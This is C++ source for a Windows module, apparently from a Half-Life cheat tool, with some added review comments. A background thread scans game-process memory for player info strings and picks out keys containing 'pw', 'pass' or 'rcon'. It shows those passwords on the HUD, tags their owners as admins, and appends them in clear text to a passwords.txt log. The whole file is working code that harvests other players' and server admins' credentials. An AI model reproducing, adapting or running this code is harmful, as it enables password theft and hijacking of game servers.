#include <windows.h>
#include <vector>
#include <string>
#include <fstream>
using namespace std;
#include "sniff.h"
#include "cvar.h"
#include "timehandling.h"
#include "stringfinder.h"
// HUD text buffer (fixed at 256 bytes) and its display timer; both are
// defined elsewhere and written by pwScan() in this file.
extern char gHudMessage[256];
extern StopTimer gHudTimer;
// The single global sniffer instance.
HLSniffer hlSniffer;
//============================================================
//void Dump (void * addr, DWORD length)
//{
// char filename[256];
// sprintf(filename,"c:\\tmpaxx\\A%x-L%d.bin",(DWORD)addr,length);
//
// FILE * fp = fopen (filename, "wb");
// fwrite ((void*)addr, 1, length, fp);
// fclose (fp);
//}
// Adds AddValue bytes to ptr and casts the sum to `cast`.
// NOTE(review): both operands are forced through DWORD (32 bits), so a
// pointer wider than 32 bits would be truncated here - confirm this file is
// only ever built for 32-bit targets.
#define MakePtr(cast, ptr, AddValue) (cast)( (DWORD)(ptr)+(DWORD)(AddValue))
//=======================================================
// Enumerates the calling process's address space with VirtualQuery, starting
// at address 0, and passes every committed region whose size lies strictly
// between 500000 and 4000000 bytes to scan().
// Only State and RegionSize are examined when selecting a region.
void HLSniffer::sniff()
{
    MEMORY_BASIC_INFORMATION region;

    for (void* cursor = (void *)0x00000000;
         VirtualQuery(cursor, &region, sizeof(region));
         cursor = MakePtr(void *, cursor, region.RegionSize))   // step to the next region
    {
        const bool committed    = (region.State == MEM_COMMIT);
        const bool sizeInWindow = (region.RegionSize > 500000 && region.RegionSize < 4000000);
        if (!committed || !sizeInWindow) continue;

        scan((char*)cursor, region.RegionSize);
    }
}
////=======================================================
// printf-style message routine; declared here, defined elsewhere.
void OGCmessage(const char *fmt, ... );
//=======================================================
// Splits one backslash-delimited info string of the form
//   \key\value\...\name\<nick>\key\value...
// into parallel key/value lists.
//
//   dump_string     text to parse; only its first 1021 bytes are considered.
//   out_name        receives the value following "\name\" (emptied first).
//   out_cvarnames   receives the keys (cleared first).
//   out_cvarvalues  receives the values, index-aligned with out_cvarnames
//                   (cleared first).
//
// When "\name\" does not occur, all three outputs are left empty. Pairs in
// front of "\name\" are emitted walking backwards (nearest pair first), then
// the ("name", nick) pair, then the pairs behind it in their original order.
void scanCVAR(const string& dump_string, string& out_name, vector<string>& out_cvarnames, vector<string>& out_cvarvalues)
{
    out_name.erase();
    out_cvarnames.clear();
    out_cvarvalues.clear();

    // Work on a private, truncated copy: the separators are overwritten below.
    char buf[1024];
    strncpy(buf, dump_string.c_str(), 1022);
    buf[1021] = 0;

    char* const nameTag = strstr(buf, "\\name\\");
    if (!nameTag) return;

    char* const first = buf;
    char* const last  = buf + strlen(buf);

    // Turn every backslash into a terminator so each token is its own C string.
    char* p = first;
    while (p < last)
    {
        if (*p == '\\') *p = 0;
        ++p;
    }

    // Pairs in front of "\name\", walked right to left.
    p = nameTag - 1;
    do
    {
        while (p > first && *p) --p;       // back up to the terminator before the value
        if (p <= first) break;             // a lone token without a partner
        const string value(p + 1);
        --p;                               // last character of the key (or its terminator)
        while (p > first && *p) --p;       // back up to the terminator before the key
        if (!*p) ++p;                      // step off the terminator onto the key
        out_cvarnames.push_back(p);
        out_cvarvalues.push_back(value);
        p -= 2;                            // last character of the preceding value
    } while (p > first);

    // The nick itself; "\name\" is six characters long.
    p = nameTag + 6;
    out_name = p;
    out_cvarnames.push_back("name");
    out_cvarvalues.push_back(out_name);
    p += out_name.size() + 1;

    // Pairs behind the nick, left to right.
    while (p < last)
    {
        const string key(p);
        p += key.size() + 1;
        if (p >= last) break;              // trailing key with no value is dropped
        const string val(p);
        out_cvarnames.push_back(key);
        out_cvarvalues.push_back(val);
        p += val.size() + 1;
    }
}
//=======================================================
// Reports whether any key contains one of the substrings "pw", "pass" or
// "rcon", stopping at the first such key.
//
//   names      keys to inspect.
//   values     values, index-aligned with names (indexed without a separate
//              bounds check, so it must be at least as long as names).
//   out_name   optional; receives the first matching key.
//   out_value  optional; receives the value at the same index.
//
// Returns true on the first match, false when no key matches; the outputs
// are left untouched in the latter case.
bool cvarNameScan(vector<string>& names,vector<string>& values, string* out_name=NULL, string* out_value=NULL)
{
    static const char* const kMarkers[] = { "pw", "pass", "rcon" };
    const size_t markerCount = sizeof(kMarkers) / sizeof(kMarkers[0]);

    for (size_t idx = 0; idx < names.size(); ++idx)
    {
        const string& candidate = names[idx];

        bool hit = false;
        for (size_t m = 0; m < markerCount && !hit; ++m)
        {
            hit = (candidate.find(kMarkers[m]) != string::npos);
        }
        if (!hit) continue;

        if (out_name)  *out_name  = candidate;
        if (out_value) *out_value = values[idx];
        return true;
    }
    return false;
}
// Declared here, defined elsewhere; presumably maps basename to a path in the
// tool's own directory - confirm against the definition.
string getOgcDirFile(const char* basename);
// Names already reported by pwScan(); used there to tell a first sighting
// from a repeat.
StringFinder dupecheck;
//=======================================================
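// Parses one collected info string and, when cvarNameScan() flags one of its
// keys, reports it and appends the record to a log file.
//
//   cvars   one backslash-delimited info string as collected by
//           HLSniffer::scan().
//
// Effects visible in this function:
//   - the parsed name is added to `dupecheck` on first sighting;
//   - gHudMessage / gHudTimer and OGCmessage() are used to notify on a first
//     sighting, or on every sighting when cvar.sniff == 2;
//   - on a first sighting every key/value pair whose key is not on the
//     exclude list is appended, in clear text, to the file named by
//     getOgcDirFile("passwords.txt").
//
// The HUD text is composed in a std::string and copied with an explicit bound
// because gHudMessage holds only 256 bytes while the three inserted strings
// come from a parse buffer of up to 1021 bytes; an unbounded sprintf() into
// that array could write past its end.
// NOTE(review): OGCmessage()'s own buffer handling is not visible here.
void pwScan(const string& cvars)
{
    vector<string> names;
    vector<string> values;
    string nick;
    scanCVAR(cvars,nick,names,values);

    string found_value;
    string found_name;
    if(!cvarNameScan(names,values,&found_name,&found_value)) return;

    bool isdupe = dupecheck.find(nick.c_str());
    if(!isdupe) dupecheck.add(nick.c_str(),0);

    if(cvar.info>=5)OGCmessage("found: %s dupe: %d", nick.c_str(),isdupe);

    // notify
    if(!isdupe || cvar.sniff==2)
    {
        const string hud = nick + ": " + found_name + " \"" + found_value
                         + "\", use \"query\" to find more infos";
        // Bounded copy: anything beyond the buffer is truncated, and the
        // terminator is written explicitly because strncpy does not add one
        // when the source fills the whole span.
        strncpy(gHudMessage, hud.c_str(), sizeof(gHudMessage)-1);
        gHudMessage[sizeof(gHudMessage)-1] = 0;
        gHudTimer.countdown(10);
        OGCmessage("%s: %s \"%s\"", nick.c_str(), found_name.c_str(), found_value.c_str() );
    }

    if(isdupe) return;

    // log (append mode, so earlier records are kept)
    ofstream pwlog( getOgcDirFile("passwords.txt").c_str(), ios::app);

    // Keys that are left out of the log; filled once on the first call.
    static bool excludeInitialized = false;
    static StringFinder exclude;
    if(!excludeInitialized)
    {
        excludeInitialized=true;
        exclude.add("topcolor",0);
        exclude.add("bottomcolor",0);
        exclude.add("rate",0);
        exclude.add("cl_updaterate",0);
        exclude.add("cl_lw",0);
        exclude.add("cl_lc",0);
        exclude.add("cl_dlmax",0);
        exclude.add("lefthand",0);
        exclude.add("vgui_menus",0);
        exclude.add("model",0);
        exclude.add("ah",0);
        exclude.add("dm",0);
        exclude.add("ghosts",0);
    }

    for(unsigned int i=0;i<names.size();i++)
    {
        if(!exclude.find(names[i].c_str()))
        {
            pwlog<<names[i]<<" = "<<values[i]<<endl;
        }
    }
    pwlog<<"========================================"<<endl;
    pwlog.close();
}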
//=======================================================
// Searches a memory region for "\name\" markers, stores every NUL-terminated
// string that contains one in cvarDump (replacing its previous contents), and
// then runs pwScan() on each stored string.
//
//   data   start of the region to search.
//   size   length of the region in bytes.
//
// Returns without touching cvarDump when no marker is found in the first
// 0xFFFF byte offsets.
void HLSniffer::scan(const char* data, int size)
{
// Pass 1: probe the first 0xFFFF byte offsets for a single "\name\" marker.
// NOTE(review): this bound is a constant and does not consult `size`, and
// each probe reads pos[0..5]; the only caller visible in this file passes
// regions larger than 500000 bytes.
// NOTE(review): `register` is not a valid storage class from C++17 onwards.
register int countDown = 0xFFFF;
register const char* pos = data;
// do we have the right chunk?
bool found = false;
while(countDown){
if( pos[0]=='\\' && pos[1]=='n' && pos[2]=='a' && pos[3]=='m' && pos[4]=='e' && pos[5]=='\\' ) { found = true; break; }
++pos;
--countDown;
}
if(!found) return;
//OGCmessage("Global Cvars found, scanning...");
// Pass 2: walk size-32 byte offsets from the start and collect every string
// that contains a marker.
// NOTE(review): for size < 32 the counter starts negative and the
// `while(countDown)` test would not stop at the end of the region.
cvarDump.clear();
countDown = size-32;
pos = data;
while(countDown){
if( pos[0]=='\\' && pos[1]=='n' && pos[2]=='a' && pos[3]=='m' && pos[4]=='e' && pos[5]=='\\' )
{
// Back up to the NUL byte in front of the marker; the string starts one
// byte after it.
// NOTE(review): the backward walk has no lower bound at `data`, and the
// string constructor below reads up to the next NUL with no upper bound at
// data+size, so both can touch memory outside the region.
const char *begin = pos;
while(*begin) begin--;
begin++;
string cvars( begin );
cvarDump.push_back(cvars);
}
++pos;
--countDown;
}
// OGCmessage("done. Use \"query\" to view collected information.");
// Hand every collected string to pwScan().
for(unsigned int i=0;i<cvarDump.size();i++) pwScan(cvarDump[i]);
}
//=======================================================
// Prints collected records through OGCmessage().
//
//   indexStr   empty: list every record in cvarDump as "# <index> = <name>",
//              using the "&r# <index> [admin] = <name>" form when
//              cvarNameScan() flags the record.
//              non-empty: converted with atoi() and used as an index into
//              cvarDump; every key/value pair of that record is printed, or
//              "&rinvalid number" when the index is out of range.
//
// atoi() yields 0 for non-numeric text, so such input selects record 0; a
// negative number converts to a large unsigned value and is rejected by the
// range check.
// NOTE(review): scan() rewrites cvarDump and no locking is visible in this
// file - confirm which thread calls query().
void HLSniffer::query(const string& indexStr)
{
    // scanCVAR() resets all three outputs on every call, so they can be reused.
    vector<string> keys, vals;
    string nick;

    if (!indexStr.empty())
    {
        const unsigned int index = atoi(indexStr.c_str());
        if (index >= cvarDump.size())
        {
            OGCmessage("&rinvalid number");
            return;
        }

        scanCVAR(cvarDump[index], nick, keys, vals);
        for (unsigned int row = 0; row < keys.size(); ++row)
        {
            OGCmessage("%s = %s",keys[row].c_str(), vals[row].c_str());
        }
        return;
    }

    for (unsigned int slot = 0; slot < cvarDump.size(); ++slot)
    {
        scanCVAR(cvarDump[slot], nick, keys, vals);
        if (cvarNameScan(keys, vals))
        {
            OGCmessage( "&r# %d [admin] = %s",slot,nick.c_str() );
        }
        else
        {
            OGCmessage( "# %d = %s",slot,nick.c_str() );
        }
    }
}
//=======================================================
// Thread body: every 10 seconds, runs sniff() when cvar.sniff is non-zero,
// announcing the pass first when cvar.info equals 5. Never returns.
// Every C++ exception raised during a pass is discarded by catch(...);
// whether hardware faults raised while reading memory are caught as well
// depends on the compiler's exception model, which is not visible here.
void HLSniffer::mainthread()
{
    for (;;)
    {
        try
        {
            Sleep(10000);
            if (!cvar.sniff) continue;

            if (cvar.info == 5) OGCmessage("sniffing...");
            sniff();
        }
        catch (...)
        {
            // a failed pass is dropped; the next one starts after the sleep
        }
    }
}
//=======================================================
// Thread entry point handed to CreateThread(): lpParam is the HLSniffer
// instance whose mainthread() is run. mainthread() loops forever, so the
// return statement is only there to satisfy the signature.
DWORD WINAPI SnifferThread( LPVOID lpParam )
{
    static_cast<HLSniffer*>(lpParam)->mainthread();
    return 0;
}
//=======================================================
// Starts the background thread once: does nothing when hThread is already
// set. The thread is created with a 256 KiB stack size argument, runs
// SnifferThread with this object as its parameter, and is dropped to the
// lowest priority when creation succeeds.
// NOTE(review): hThread's initial value and any CloseHandle() for it are not
// visible in this file.
void HLSniffer::createthread()
{
    if (hThread) return;

    DWORD threadId;
    hThread = CreateThread(NULL,256*1024,SnifferThread,(LPVOID)this,0,&threadId);
    if (!hThread) return;

    SetThreadPriority(hThread,THREAD_PRIORITY_LOWEST);
}